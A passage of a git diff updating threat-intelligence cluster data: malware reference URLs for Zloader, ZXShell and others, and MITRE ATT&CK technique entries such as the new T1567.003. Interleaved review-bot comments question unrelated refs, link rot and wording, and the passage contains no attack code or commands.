+ "https://documents.trendmicro.com/assets/txt/IOCs-zloader-campaigns-at-a-glance.txt",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
+ "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
+ "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://cybleinc.com/2021/04/19/zloader-returns-through-spelevo-exploit-kit-phishing-campaign/",
+ "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/",
"https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
+ "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
+ "https://blog.alyac.co.kr/3322",
+ "https://blog.vincss.net/2022/04/re026-a-deep-dive-into-zloader-the-silent-night.html",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/zloader-campaigns-at-a-glance",
"https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
- "https://labs.k7computing.com/?p=22458",
- "https://blogs.quickheal.com/zloader-entailing-different-office-files/",
- "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/",
- "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.forcepoint.com/blog/x-labs/invoicing-spam-campaigns-malware-zloader",
- "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
+ "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
"https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/",
- "https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/",
- "https://www.hornetsecurity.com/en/threat-research/zloader-email-campaign-using-mhtml-to-download-and-decrypt-xls/"
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://www.youtube.com/watch?v=QBoj6GB79wM",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://johannesbader.ch/blog/the-dga-of-zloader/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://aaqeel01.wordpress.com/2021/10/18/zloader-reversing/",
+ "https://www.youtube.com/watch?v=mhX-UoaYnOM",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/",
+ "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/",
+ "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/",
+ "https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://web.archive.org/web/20200929145931/https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/",
+ "https://info.phishlabs.com/blog/zloader-dominates-email-payloads-in-q1",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex"
],
"synonyms": [
"DELoader",
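Review bot: Two of the refs added to the Zloader entry should be confirmed before merge because nothing in the URL ties them to Zloader: "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf" is the Microsoft complaint about cracked Cobalt Strike, and "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf" is a RIG report. If they were attached because the documents discuss Zloader delivery, fine, but a reviewer cannot tell that from the diff, and the remaining `+` lines here are otherwise re-adds of refs that already existed (for example the CISA AA22-110A alert and PDF).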
@@ -49546,8 +52169,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob",
- "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/",
- "https://en.wikipedia.org/wiki/Zlob_trojan"
+ "https://en.wikipedia.org/wiki/Zlob_trojan",
+ "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/"
],
"synonyms": [],
"type": []
@@ -49576,8 +52199,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek",
- "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/",
- "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/"
+ "https://www.welivesecurity.com/br/2018/01/17/zumanek-malware-tenta-roubar-credenciais-de-servicos/",
+ "https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/"
],
"synonyms": [],
"type": []
@@ -49619,37 +52242,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://risky.biz/whatiswinnti/",
- "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw",
- "https://attack.mitre.org/groups/G0001/",
- "https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://lab52.io/blog/apt27-rootkit-updates/",
- "https://attack.mitre.org/groups/G0096",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
- "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
"https://content.fireeye.com/apt-41/rpt-apt41",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/apt27-rootkit-updates/",
+ "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html",
+ "https://mp.weixin.qq.com/s/K1uBLGqD8kgsIp1yTyYBfw",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://github.com/smb01/zxshell",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf"
+ "https://blogs.cisco.com/security/talos/opening-zxshell",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
+ "https://risky.biz/whatiswinnti/"
],
"synonyms": [
"Sensocode"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "5b9dc67e-bae4-44f3-b58d-6d842a744104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15",
"value": "ZXShell"
},
@@ -49658,8 +52272,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz",
- "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html"
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/"
],
"synonyms": [
"MuuyDownloader"
@@ -49684,5 +52298,5 @@
"value": "Zyklon"
}
],
- "version": 15976
+ "version": 17779
}
diff --git a/clusters/mitre-attack-pattern.json b/clusters/mitre-attack-pattern.json
index d035b35..ca66d8d 100644
--- a/clusters/mitre-attack-pattern.json
+++ b/clusters/mitre-attack-pattern.json
@@ -639,7 +639,6 @@
"http://msdn.microsoft.com/en-us/library/aa376977",
"https://attack.mitre.org/techniques/T1547/001",
"https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/",
- "https://capec.mitre.org/data/definitions/270.html",
"https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry",
"https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
"https://technet.microsoft.com/en-us/sysinternals/bb963902"
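Review bot: This hunk and the three that follow (T1574/007, T1574/008, T1036.005) strip every capec.mitre.org reference from refs, leaving the attack.mitre.org technique URL as the only external link in the T1574/007 case. If this mirrors an upstream mitre/cti change that removed CAPEC external references, it is correct, but the commit message should state that, because users who pivoted from these ATT&CK techniques to CAPEC lose that link with no replacement.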
@@ -834,9 +833,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1574/007",
- "https://capec.mitre.org/data/definitions/13.html",
- "https://capec.mitre.org/data/definitions/38.html"
+ "https://attack.mitre.org/techniques/T1574/007"
]
},
"related": [
@@ -869,7 +866,6 @@
"http://msdn.microsoft.com/en-us/library/ms682425",
"http://msdn.microsoft.com/en-us/library/ms687393",
"https://attack.mitre.org/techniques/T1574/008",
- "https://capec.mitre.org/data/definitions/159.html",
"https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120",
"https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN"
]
@@ -1457,7 +1453,7 @@
"value": "LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"
},
{
- "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
+ "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
"meta": {
"external_id": "T1048.003",
"kill_chain": [
@@ -1473,11 +1469,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
- "https://attack.mitre.org/techniques/T1048/003"
+ "https://attack.mitre.org/techniques/T1048/003",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689"
]
},
"related": [
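Review bot: The new cisco.com ref added for T1048.003 ends in a page-internal anchor (#wp1068167689) that may not survive a reorganisation of the Cisco IOS command reference; consider linking the page without the fragment or adding a web.archive.org copy alongside it. Adding "Network" to mitre_platforms in the same hunk matches the new "(Citation: copy_cmd_cisco)" marker in the description hunk above, so that part reads as intended.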
@@ -1535,7 +1533,6 @@
"refs": [
"http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf",
"https://attack.mitre.org/techniques/T1036/005",
- "https://capec.mitre.org/data/definitions/177.html",
"https://docs.docker.com/engine/reference/commandline/images/",
"https://twitter.com/ItsReallyNick/status/1055321652777619457"
]
@@ -1550,7 +1547,7 @@
"value": "Match Legitimate Name or Location - T1036.005"
},
{
- "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ",
+ "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)",
"meta": {
"external_id": "T1562.004",
"kill_chain": [
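Review bot: "potentially less securitized port" in the added sentence is odd wording ("less scrutinized" or "less secured" is presumably meant). Since the description is imported verbatim from upstream, it should be raised there rather than hand-edited here, or the next sync will overwrite the fix.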
@@ -1568,7 +1565,8 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1562/004"
+ "https://attack.mitre.org/techniques/T1562/004",
+ "https://twitter.com/TheDFIRReport/status/1498657772254240768"
]
},
"related": [
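Review bot: the reference that backs the new change_rdp_port_conti citation is a bare Twitter status URL (twitter.com/TheDFIRReport/status/1498657772254240768). Tweets are routinely deleted or made private, so add a web.archive.org capture alongside it, as is already done for the echosec link in the T1567.003 hunk of this same patch.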
@@ -1581,7 +1579,7 @@
"value": "Disable or Modify System Firewall - T1562.004"
},
{
- "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+ "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
"meta": {
"external_id": "T1562.007",
"kill_chain": [
@@ -1596,7 +1594,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/007",
- "https://expel.io/blog/finding-evil-in-aws/"
+ "https://expel.io/blog/finding-evil-in-aws/",
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
]
},
"related": [
@@ -1683,6 +1682,36 @@
"uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"value": "Windows Management Instrumentation Event Subscription - T1546.003"
},
+ {
+ "description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com
, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.",
+ "meta": {
+ "external_id": "T1567.003",
+ "kill_chain": [
+ "mitre-attack:exfiltration"
+ ],
+ "mitre_data_sources": [
+ "Network Traffic: Network Traffic Content",
+ "Network Traffic: Network Traffic Flow"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1567/003",
+ "https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "ba04e672-da86-4e69-aa15-0eca5db25f43",
+ "value": "Exfiltration to Text Storage Sites - T1567.003"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP%
directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"meta": {
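Review bot: the subtechnique-of relation in the new T1567.003 entry points at dest-uuid 40597f16-0963-4249-bf4c-ac93b7fb9807; please confirm that uuid is the parent T1567 (Exfiltration Over Web Service) cluster in this file, because a dangling dest-uuid does not fail validation but silently breaks the galaxy's relationship graph. Minor: "which highlight access" in the description should be "highlights", but as upstream text it belongs in an upstream fix.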
@@ -1736,7 +1765,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/009",
- "https://capec.mitre.org/data/definitions/38.html",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree",
"https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464",
"https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/",
@@ -2128,8 +2156,7 @@
"Linux"
],
"refs": [
- "https://attack.mitre.org/techniques/T1037",
- "https://capec.mitre.org/data/definitions/564.html"
+ "https://attack.mitre.org/techniques/T1037"
]
},
"uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
@@ -2155,8 +2182,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1039",
- "https://capec.mitre.org/data/definitions/639.html"
+ "https://attack.mitre.org/techniques/T1039"
]
},
"uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
@@ -2925,7 +2951,6 @@
"http://msdn.microsoft.com/en-us/library/aa376977",
"https://attack.mitre.org/techniques/T1547",
"https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order",
- "https://capec.mitre.org/data/definitions/564.html",
"https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx",
"https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx",
"https://technet.microsoft.com/en-us/sysinternals/bb963902",
@@ -2966,7 +2991,7 @@
"value": "Remotely Track Device Without Authorization - T1468"
},
{
- "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. 
These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)",
+ "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. 
These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)",
"meta": {
"external_id": "T1649",
"kill_chain": [
@@ -2994,7 +3019,8 @@
"https://github.com/TheWover/CertStealer",
"https://o365blog.com/post/deviceidentity/",
"https://posts.specterops.io/certified-pre-owned-d95910965cd2",
- "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf"
+ "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf",
+ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming"
]
},
"uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
@@ -3078,7 +3104,6 @@
"https://attack.mitre.org/techniques/T1558",
"https://blog.stealthbits.com/detect-pass-the-ticket-attacks",
"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/",
- "https://capec.mitre.org/data/definitions/652.html",
